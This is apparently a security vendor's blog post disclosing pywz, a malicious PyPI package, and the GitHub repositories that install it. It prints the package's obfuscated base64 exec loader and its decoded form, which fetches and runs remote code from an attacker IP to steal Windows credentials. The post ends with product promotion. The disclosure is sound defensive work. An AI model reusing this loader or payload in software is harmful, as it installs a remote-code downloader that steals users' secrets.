Cookies Notice
This site uses cookies to deliver services and to analyze traffic.
December 7 2022 | 4 min read
Technical | December 7 2022 | 4 min read
Apiiro’s AI Detection Engine discovered yesterday a malicious package in PyPI package manager, which was uploaded on Dec 2nd.
Once installed, the malicious package, pywz, is decoding a base64 string and executing the decoded Python code. Upon execution, the code is sending an HTTP request to hxxp[:]//20.82.144.179/inject/ZuMraKSQ712AqmF9 and then it stores the response as a local temp file.
Then it’s renaming the file to .exe and running the malicious exe file. The adversary targets mainly windows users. It intended to grab Registry secret keys and passwords in order to leak them to the adversarial entity.
We were able to locate 11 GitHub accounts with repositories that install this malicious package. We notified Pypi about the malicious package and GitHub about the malicious repositories and the suspicious accounts
The malicious package details in pypi:
The following analysis refers to the updated version of pywz (0.1.4), released on Dec 7th 2022.
Once installed, the malicious package, pywz, is decoding a base64 string and executing the decoded Python code.
;__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vMjAuODIuMTQ0LjE3OS9pbmplY3QvWnVNcmFLU1E3MTJBcW1GOScpLnJlYWQoKSkiIiIpCl90dG1wLmNsb3NlKCkKdHJ5OiBfc3N5c3RlbShmInN0YXJ0IHtfZWV4ZWN1dGFibGUucmVwbGFjZSgnLmV4ZScsICd3LmV4ZScpfSB7X3R0bXAubmFtZX0iKQpleGNlcHQ6IHBhc3M="),'<string>','exec'))
from tempfile import NamedTemporaryFile as _ffile from sys import executable as _eexecutable from os import system as _ssystem _ttmp = _ffile(delete=False) _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('hxxp[:]//20.82.144.179/inject/ZuMraKSQ712AqmF9').read())""") _ttmp.close() try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}") except: pass<br />
Upon execution, the Python code is sending an HTTP request to hxxp://20.82.144.179/inject/ZuMraKSQ712AqmF9 and then it stores the response as a local temp file. Then, it’s running the malicious exe file.
The attackers were using a known obfuscator for python named Oxyry in order to obfuscate their retracted payload code.
The adversary targets mainly windows users. It intended to grab Registry secret keys and passwords in order to leak them to the adversarial entity.
Code is staying resident and polling the server for a python module and rerun once payload is downloaded.
We were able to locate the following Github project that installs the malicious Pypi package: hxxps://github.com/mobcode1337/Twitter-Account-Creator The repo was uploaded two weeks ago by mobcode1337, a contributor that joined Github on 25/9/22.
This Github repo has 20 stars and 10 forks. The forks lead us to another 10 suspicious accounts that share also forks of two other repos by the same malicious user:
https://github.com/smallest/Twitter-Scrapper and https://github.com/smallest/Valorant-Checker
While analyzing the requirements file of these repositories, we identified coloriv, another malicious pypi package that share the same infection mechanism of pywz.
The majority of the users with those accounts joined Github during the last month.
After further analyzing mobcode1337 Github account, we identified another repo that installs the same pywz malicious package: hxxps[:]//github[.]com/mobcode1337/DM-Killer
This repo has 19 stars and 8 forks.
Legacy SCA, SAST, or current software supply chain security tools, will not identify this type of vulnerability. Why? First and foremost, these tools are not scanning the package source code or analyzing the open source developers’ behavior and reputation, they only match between CVEs to a package.
At Apiiro, we combine several adaptive AI-based approaches that enable the detection of advanced application-level and software supply chain attacks. The approaches cover all the attack aspects:
A comprehensive approach is essential to the detection of such advanced attacks. Such an approach conceptualizes the attack and gives it context – the package developer’s behavior, reputation, development process, artificial usages, and the packages it tries to mimic. Given such a rich context – quick attack detection is possible.